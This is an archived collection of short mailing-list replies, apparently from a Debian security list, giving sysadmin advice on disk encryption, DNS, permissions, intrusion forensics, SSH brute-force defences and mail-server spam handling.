In article [EMAIL PROTECTED] you wrote: losetup -e aes-256 /dev/loop0 /dev/hda10 What do you have defined in modules? alias cipher-16 rijndael You also need the cryptoloop module in order to name ciphers by name. Try -E 16 instead. Greetings Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Dns refresh
In article [EMAIL PROTECTED] you wrote: Hello, I have a server and I changed the ip number of the server and the nameserver (and restarted the services) but when i try to reach the server, it goes to the old ip. How can I make the dns to refresh the ip number? Check for entries in /etc/hosts on the client and look for a nscd process and kill it. You might also check if your client is using another nameserver, in that case the ttl is responsible. try dig a servername on the client to see which nameserer responds with which value. BTW: you are on the wrong list, try debian-users, please Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Hash database
In article [EMAIL PROTECTED] you wrote: if [ -f $tmpdir/md5sums ] ; then cat $tmpdir/md5sums $targetfile else echo No md5sums for $deb! is is most likely better to calculate the md5sums for the files, since not all packages have the md5 sums, and is expected that dpkg calculates them, instead. Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: using sarge on production machines
In article [EMAIL PROTECTED] you wrote: I also think sarge will be used more and more over the next few weeks and months whether it is released or not, certainly where security is not such a big issue. Well, if you need a secure samba or recent PHP, you may not have an option. Greetings Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Compromised system - still ok?
In article [EMAIL PROTECTED] you wrote: - for forensics.. use a good cd or build a custom disk with with lot of fun forensics on it and fiddle till one finds all the answers :-0 Make sure that you don't do forensics on the original image. Investigating the situation may require running fsck etc which changes things. And talking about forensics: use script to generate a complete typescript of your forensics session. Greetings Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Cyrus21 does not work corectly with SSL
In article [EMAIL PROTECTED] you wrote: 'Toto Root CA' seems to be a self signed certificate instead of an undependent certificate as your root certificate. You don't have to self sign a root certificate. You need a signature on all certificates, so root certificates are selfsigned. Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: IDNA and security
In article [EMAIL PROTECTED] you wrote: The name is what associates a CA signature with a site. They're not signing the IP number. The Browser is checking the address agaist the DN itself. So if the padlock is blue, the certificate is for the current URL. Then you have to check the content of the certificate who owns it. There is no special value in the name. debian.xx does not belong to debian, as long as the Certificate is not for debian. IDN Attacks against the url are for site spoofings which attack users who do not use SSL certificates. And those are always at a higher risk. Greetings Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Compromised system - still ok?
In article [EMAIL PROTECTED] you wrote: I co-administer a system with ~ 250 users, a significant part of them I don't know very well personally, and really, I don't rule out some of them might try to do some cracking, of, more likely, has such a shoddy password policy or infected windows system that their account will be used to. Should I now reinstall these systems daily? Well, the problem is of course root compromise. However, on such a system, break-ins are very likely and you better do checks regularly. This is to protect your users. In both my case, and the thread starter's case, a normal user account might or was definitely in the hands of someone malicious. In both cases, no evidence whatsoever was there that there was even an attempt at becoming root. Then a re-install might not be needed. At least if you can explain how the user account could have been compromised. Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Compromised system - still ok?
In article [EMAIL PROTECTED] you wrote: - works great across the usa, even if the cracked box they came from was offshore, they can trace it back to somebody's bedroom or colo is that first hand knowledge or just some usual urband legend? Greetings Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Compromised system - still ok?
In article [EMAIL PROTECTED] you wrote: you can reinstall AFTER you can answer all the above questions or give up and give the point ot the script kiddie cracker No, you make an image, reinstall, and if you have time (ie. you normally dont) then you can start the forensics. Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: woody kernel image
In article [EMAIL PROTECTED] you wrote: There are Security Updates for kernel 2.4.18 The last update for kernel-source-2.4.18 in stable was in April 2004. BTW: I wonder why http://packages.qa.debian.org/k/kernel-source-2.4.18.html contains the latest version 2.4.18-14.3 but no entry in the latest news for it. Greetings Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: auth log
In article [EMAIL PROTECTED] you wrote: Does any body know what this is mean: su[32278]: + ??? root-nobody I found this line in my auth.log file. It means some root process has used su to drop priveledges and become nobody. cron jobs are known to do that. Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: File System Integrity Checker for Sarge
In article [EMAIL PROTECTED] you wrote: Is there one that stands out as being easy to configure/tune for Sarge ? integrit is pretty easy methinks. Greetings Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: rm files owned by root?
In article [EMAIL PROTECTED] you wrote: So if my /home/ is 775 and root.users and I'm in the group users I can delete everybody's home directory? You need write access to the /home dir, then you can delete other uses homes. But to delete a directory, it must be empty. And you cant empty it if you cant get into it or have write access inside. However you can delete empty dirs and files if you dont own them or have write access to them, yes. Greetings Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: rm files owned by root?
In article [EMAIL PROTECTED] you wrote: Not on linux. Well, he can of course remove the directory entry with a fs debug tool or disk editor. But thats not possible with user rights w/o raw access richts to the device. However I think sys_unlink wont do it. I was looking for the source but this special policy is a bit hidden in all filesystems. Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: rm files owned by root?
In article [EMAIL PROTECTED] you wrote: Removing a directory requires write permission on the directory itself, because you have to delete the . and .. links inside the directory. no: [EMAIL PROTECTED]:~# mkdir /home/test [EMAIL PROTECTED]:~# chmod 0 /home/test [EMAIL PROTECTED]:~# ls -ld /home /home/test drwxrwxr-x 12 root adm 123 Jan 2 22:12 /home/ d- 2 root root 6 Jan 2 22:14 /home/test/ [EMAIL PROTECTED]:~# exit [EMAIL PROTECTED]:~ id uid=1001(ecki) gid=1001(ecki) groups=0(root),4(adm),20(dialout),24(cdrom),29(audio),38(list),1001(ecki) [EMAIL PROTECTED]:~ rmdir /home/test Greetings Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: rm files owned by root?
In article [EMAIL PROTECTED] you wrote: if you are in group adm and the /home allows adm group to write to it, you will be able to remove the directory test? inside /home/ Yes, thats what this thread is about. I can remove an *empty* dir, even if i dont have permissions inside the dir. All I need is write access to the parent. If it is not empty, I need to be able to empty it up, before, which requires write and execute access to the dir (and childs) Greetings Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: rm files owned by root?
In article [EMAIL PROTECTED] you wrote: It asks if I want to remove this file, since it's write protected. If I say y, then the file gets deleted. But it shouldn't be! Should it? This is a Unix FAQ. You can delete any file if you have write access to the directory. Actually you dont delete the file, you remove the link to the file from the dir. Only if it is the last link to the directory structure, the file will be removed and the area freed. Greetings Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: php vulnerabilities
In article [EMAIL PROTECTED] you wrote: IOW, the soaking period is required. But we don't hide Bugs. And given the voluntary nature of Debian a lot of fixes just wont happen before the velnerability is widely known, anyway. Just see the current samba problem. And besides the openssh disaster I dont see many destructive security patches, especially not with debians conservative backporting strategy. Greetings Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: php vulnerabilities
On Thu, Dec 23, 2004 at 11:48:34PM +0100, Florian Weimer wrote: IOW, the soaking period is required. .. Sorry for being unclear. The soaking period starts *after* the issue has been published. This means we will not provide patches or does it mean we will provide them for the user to chose? The first is I guess not acceptable, and the later is current policy. You do not have to install the patches if you want to let the soak. Greetings Bernd -- (OO) -- [EMAIL PROTECTED] -- ( .. ) [EMAIL PROTECTED],linux.de,debian.org} http://www.eckes.org/ o--o 1024D/E383CD7E [EMAIL PROTECTED] v:+497211603874 f:+497211606754 (OO) When cryptography is outlawed, bayl bhgynjf jvyy unir cevinpl! -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: php vulnerabilities
Hallo Florian, On Fri, Dec 24, 2004 at 12:37:24AM +0100, Florian Weimer wrote: Look at the Mozilla version in stable, and the issues surrounding it, and you will understand. Yes, actually I really think that backporting is not possible nor effective in a lot of situations. And yes you are right, a new Upstream Version needs Soaking. However this discussion is therefore quite theoretical, I see currently nearly no way for any major update to slip into stable. Too much core maintainers would object. It is more likely the software is removed on an revision. (and i am not sure it that is a good solution, especially for commonly used programs) Mozilla is a quite interesting subject to study: It might break a lot of stuff if upgraded (due to the libs), and it is extremly complicated to backport the fixes (since no patch list is available). And even If (or especially when!) debian developers succeed in fixing all the bugs by backporting, the user would be frustrated by having to live with outdated versions. (I think this is true for most productvity applications and less true for server apps where a conservative patching means sense and is more common upstream anyway. (and less complicated to backport single fixes)). This is somewhat the microsoft problem - gui software and multi function packagaes are simply not sanely maintainable. Gruss Bernd -- (OO) -- [EMAIL PROTECTED] -- ( .. ) [EMAIL PROTECTED],linux.de,debian.org} http://www.eckes.org/ o--o 1024D/E383CD7E [EMAIL PROTECTED] v:+497211603874 f:+497211606754 (OO) When cryptography is outlawed, bayl bhgynjf jvyy unir cevinpl! -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [SECURITY] [DSA-594-1] New Apache packages fix arbitrary code execution
In article [EMAIL PROTECTED] you wrote: If I'm not mistaken the vulnerabilities existed in two files found in apache-common. Does anybody know why the Vuln is classified as a remote exploit? Arent SSI tags dependend on local modifications? Or are there tags which can be remote exploited, if used. Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Who runs the buildds?
In article [EMAIL PROTECTED] you wrote: Are there any buildds run by non-DDs? Do any non-DDs have access to any buildds? I think to 99% of all Debian Systems exist physical access for non-DDs. Greetings Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Providing secure file access on a colo-server
In article [EMAIL PROTECTED] you wrote: I need to provide a way for users to upload/download files from their shell accounts on a colo server I admin. The majority of the users wont want to use scp/sftp and are clueless winscp. Greetings Bernd -- eckes privat - http://www.eckes.org/ Project Freefire - http://www.freefire.org/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [OT] Collective memory query
In article [EMAIL PROTECTED] you wrote: Alternately, with sed: ] sed -si.orig -e '...' `find . -name '...'` More safely, but with more forks: ] find . -name '...' -print0 | xargs -0 sed -si.orig -e '...' BTW: I dont see how xarg would do more forks than the shell? Because the above version will fork once or not at all (if argument list is too long) and the below solution will fork as much as needed (which is once in cae the list fits into the command line). So xargs only forks one more than the backtick version. Greetings Bernd -- eckes privat - http://www.eckes.org/ Project Freefire - http://www.freefire.org/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [OT] Collective memory query
In article [EMAIL PROTECTED] you wrote: Last time I read the xargs documentation it stated that using '\0' as an input separator would also tell it to pass at most one argument to the command. echo -en a\0b\0c | xargs -t -0 echo echo a b c a b c echo -en a\0b\0c | xargs -t -s 8 -0 echo echo a a echo b b echo c c looks like it has changed, the default is to fill up the command line even with the -0 arg, unless maxline length is specified. Greetings Bernd -- eckes privat - http://www.eckes.org/ Project Freefire - http://www.freefire.org/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Rebuilding packages on *all* architectures
In article [EMAIL PROTECTED] you wrote: But what if the source is modified? This will be the next step tp solve. However I think not having a solution for that problem should not prevent us from having a sane bootstrap environment and use it. One idea could be to have an automatic way to check differences between .orig.tar.gz and upstream source, for example. Gruss Bernd -- eckes privat - http://www.eckes.org/ Project Freefire - http://www.freefire.org/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: failed root login attempts
In article [EMAIL PROTECTED] you wrote: Other than blacklisting the IPs (which is a race I am going to lose), what are people doing? Are there any distinctive marks in the SSH login attempt that one could filter on? You can either move your ssh to another port, that will greatly reduce the distributed brute force attacks, or you can put a filter with port knocking in front of it. Another option is to turn off password authentication, completely. And yes you should be worried about those attacks if you habe weak passwords. Bernd -- eckes privat - http://www.eckes.org/ Project Freefire - http://www.freefire.org/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: JavaScript and Cookies enabled in Browser
In article [EMAIL PROTECTED] you wrote: This strikes me as a dubious claim. If, as they claim, they use the browser SSL layer then they could be *as* secure as an IPSec or SSL VPN system at best, and could be completely insecure. Webex is using a java applet or activex control for displaying the remote desktop. AFAIK there is a solution on freshmeat to multiplex x clients to multiple x servers by an virtual server: xmx I think with WebEx you can only publish an Windows Desktop. In that case you can run UltraVNC on it, this is able to attach multiple clients. Greetings Bernd -- eckes privat - http://www.eckes.org/ Project Freefire - http://www.freefire.org/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: newbie iptables question
In article [EMAIL PROTECTED] you wrote: Aug 12 04:36:53 towern kernel: |iptables -- IN=ppp0 OUT= MAC= SRC=201.129.122.85 DST=12.65.24.43 LEN=48 TOS=0x00 PREC=0x00 TTL=115 ID=40023 DF PROTO=TCP SPT=4346 DPT=445 WINDOW=16384 RES=0x00 SYN URGP=0 ... It all depends on whether you have services running on your machine that listen on DPT (445 in this case). If something is there to pick up the phone so to speak, anything can happen. That service could answer on another port altogether. Well, you need to check if DST= is a local address, anyway. Gruss Bernd -- eckes privat - http://www.eckes.org/ Project Freefire - http://www.freefire.org/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: newbie iptables question
In article [EMAIL PROTECTED] you wrote: Well, you need to check if DST= is a local address, anyway. Are you suggesting that I might see stuff in my logs that was destined for a foreign IP? If so, that would make me an open mail relay, no? If your system is a gateway, this is quite common. No thats not related to mail relays. Greetings Bernd -- eckes privat - http://www.eckes.org/ Project Freefire - http://www.freefire.org/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Proposal/suggestion for security team w.r.t. published vulerabilities
In article [EMAIL PROTECTED] you wrote: mdz told me this isn't done for practical reasons: the BTS isn't very suitable for tracking which versions are affected, and a sid upload can close such a bug while it's still in woody. While I think it'd still be possible without too much hassle, if they don't want to do so, I'm not going to interfere in that. Well, I guess anybody is free to open bugs against packages if they hear about vulnerabilities. I guess this even might help in some cases. But I dont think security team can publish received vendor alerts before going public date. Effectively this is hiding, but on the other hand it is also respecting the wishes and requests of others. And not honoring them will quickly lead to debian beeing cut-off from those alerts. So thats why unpublished alerts are not posted. Greetings Bernd -- eckes privat - http://www.eckes.org/ Project Freefire - http://www.freefire.org/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: rbl's status?
In article [EMAIL PROTECTED] you wrote: This sort of thing is why I would rather use any RBL within SpamAssassin, rather than at SMTP delivery time. Even if one of these services goes completely belly up and blacklists the world, I don't automatically lose mail from it. Please dont do this. You MUST reject mails (by spam scanners, malware scanners or blacklists) on the SMTP level, otherwise you become a pretty big annoyance to the internet (if you bounce) or will siletnly lose mails (if you drop them). Greetings Bernd -- eckes privat - http://www.eckes.org/ Project Freefire - http://www.freefire.org/
Re: Unusual spam recently - hummm - postprocess
In article [EMAIL PROTECTED] you wrote: It's possible you're taking that fact into account: I'd be curious to hear how you (or others) are ensuring that such bounces go somewhere appropriate. Well, fisrt of all, I accept mail for outgoing relay only from verified sources, this includes SMTP AUTH or based on ip address. This is of course not 100% secure. And second, you should try to not generate bounces. This includes spam rejects, unknown mailboxes and virus alerts. All those must be rejcted on the smtp level. This is all one can do in his own local responsibility. For backup MX or centralized mail gateways it is therefore a matter of good service to do all those rejections at the smtp level, which might involve replicated addressbooks or even pipelining. A lot of organisations forget to include their backup mx into their mail concept and are the main reaons for bounce-floods caused by malware or faked-sender spam. (of course with open relays it does not help if you do not bounce, but those are note the biggest source of spam). Direct delivery from dialups or open proxies are much more common, at least for the large mail providers. Greetings Bernd -- eckes privat - http://www.eckes.org/ Project Freefire - http://www.freefire.org/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Unusual spam recently - hummm - postprocess
In article [EMAIL PROTECTED] you wrote: Why is SPF important? Because it eliminates joe-jobs. That is, it allows mail admins to absolutely validate the envelope return path -- significant because spammers have recently gotten around to forging sender envelope information, allowing forged mail that appears to be credibly from your domain or mine, etc. -- and as such began defeating even quite good security regimes. Solutions like yahoos DomainKeys header signature is much better suited for that, I think. http://antispam.yahoo.com/domainkeys Greetings Bernd -- eckes privat - http://www.eckes.org/ Project Freefire - http://www.freefire.org/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Unusual spam recently - hummm - postprocess
In article [EMAIL PROTECTED] you wrote: It's possible you're taking that fact into account: I'd be curious to hear how you (or others) are ensuring that such bounces go somewhere appropriate. Well, fisrt of all, I accept mail for outgoing relay only from verified sources, this includes SMTP AUTH or based on ip address. This is of course not 100% secure. And second, you should try to not generate bounces. This includes spam rejects, unknown mailboxes and virus alerts. All those must be rejcted on the smtp level. This is all one can do in his own local responsibility. For backup MX or centralized mail gateways it is therefore a matter of good service to do all those rejections at the smtp level, which might involve replicated addressbooks or even pipelining. A lot of organisations forget to include their backup mx into their mail concept and are the main reaons for bounce-floods caused by malware or faked-sender spam. (of course with open relays it does not help if you do not bounce, but those are note the biggest source of spam). Direct delivery from dialups or open proxies are much more common, at least for the large mail providers. Greetings Bernd -- eckes privat - http://www.eckes.org/ Project Freefire - http://www.freefire.org/
Re: Unusual spam recently - hummm - postprocess
In article [EMAIL PROTECTED] you wrote: Why is SPF important? Because it eliminates joe-jobs. That is, it allows mail admins to absolutely validate the envelope return path -- significant because spammers have recently gotten around to forging sender envelope information, allowing forged mail that appears to be credibly from your domain or mine, etc. -- and as such began defeating even quite good security regimes. Solutions like yahoos DomainKeys header signature is much better suited for that, I think. http://antispam.yahoo.com/domainkeys Greetings Bernd -- eckes privat - http://www.eckes.org/ Project Freefire - http://www.freefire.org/
